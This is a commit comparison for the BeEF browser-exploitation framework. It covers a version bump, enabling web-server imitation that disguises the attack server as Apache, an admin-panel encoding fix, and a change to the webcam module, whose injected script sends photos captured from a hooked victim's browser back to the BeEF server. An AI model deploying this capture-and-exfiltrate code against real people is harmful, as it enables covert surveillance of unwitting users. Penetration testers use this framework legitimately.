Compare commits
5 Commits
beef-0.4.4
...
beef-0.4.4
| Author | SHA1 | Date | |
|---|---|---|---|
|
6da4e2c39c | ||
|
|
15c7e64e93 | ||
|
|
91e2b36ce4 | ||
|
|
b82696ead2 | ||
|
|
7233957664 |
2
VERSION
2
VERSION
@@ -4,4 +4,4 @@
|
|||||||
# See the file 'doc/COPYING' for copying permission
|
# See the file 'doc/COPYING' for copying permission
|
||||||
#
|
#
|
||||||
|
|
||||||
0.4.4.4-alpha
|
0.4.4.4.1-alpha
|
||||||
|
|||||||
@@ -6,7 +6,7 @@
|
|||||||
# BeEF Configuration file
|
# BeEF Configuration file
|
||||||
|
|
||||||
beef:
|
beef:
|
||||||
version: '0.4.4.4-alpha'
|
version: '0.4.4.4.1-alpha'
|
||||||
debug: false
|
debug: false
|
||||||
|
|
||||||
restrictions:
|
restrictions:
|
||||||
@@ -43,7 +43,7 @@ beef:
|
|||||||
|
|
||||||
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
|
# Imitate a specified web server (default root page, 404 default error page, 'Server' HTTP response header)
|
||||||
web_server_imitation:
|
web_server_imitation:
|
||||||
enable: false
|
enable: true
|
||||||
type: "apache" #supported: apache, iis
|
type: "apache" #supported: apache, iis
|
||||||
|
|
||||||
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
|
# Experimental HTTPS support for the hook / admin / all other Thin managed web services
|
||||||
|
|||||||
@@ -249,18 +249,24 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
|
|||||||
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
|
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
|
||||||
html += '<p>';
|
html += '<p>';
|
||||||
for(index in record.data.data) {
|
for(index in record.data.data) {
|
||||||
result = record.data.data[index];
|
result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/<br>/g,'<br>');
|
||||||
index = index.toString().replace('_', ' ');
|
index = index.toString().replace('_', ' ');
|
||||||
//Check if the data is the image parameter and that it's a base64 encoded png.
|
// Check if the data is the image parameter and that it's a base64 encoded png.
|
||||||
if ($jEncoder.encoder.encodeForHTML(result).replace(/<br>/g,'<br>').substring(0,28) == "image=data:image/png;base64,") {
|
if (result.substring(0,28) == "image=data:image/png;base64,") {
|
||||||
//Lets display the image. // Does this introduce issues? Or, does the encoding keep this sound?
|
// Lets display the image
|
||||||
html += String.format('<img src="{0}" /><br>', $jEncoder.encoder.encodeForHTML(result).replace(/<br>/g,'<br>').substring(6));
|
try {
|
||||||
} else {
|
base64_data = window.atob(result.substring(29,result.length));
|
||||||
//output escape everything, but allow the <br> tag for better rendering.
|
html += String.format('<img src="{0}" /><br>', result.substring(6));
|
||||||
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/<br>/g,'<br>'));
|
} catch(e) {
|
||||||
|
beef.debug("Received invalid base64 encoded image string: "+e.toString());
|
||||||
|
html += String.format('<b>{0}</b>: {1}<br>', index, result);
|
||||||
|
}
|
||||||
|
} else {
|
||||||
|
// output escape everything, but allow the <br> tag for better rendering.
|
||||||
|
html += String.format('<b>{0}</b>: {1}<br>', index, result);
|
||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
html += '</p>';
|
html += '</p>';
|
||||||
return html;
|
return html;
|
||||||
}
|
}
|
||||||
|
|||||||
@@ -22,7 +22,7 @@ beef.execute(function() {
|
|||||||
|
|
||||||
|
|
||||||
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
|
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
|
||||||
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
|
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){ }';
|
||||||
|
|
||||||
//This function is called by swfobject, if if fails to add the flash file to the page
|
//This function is called by swfobject, if if fails to add the flash file to the page
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user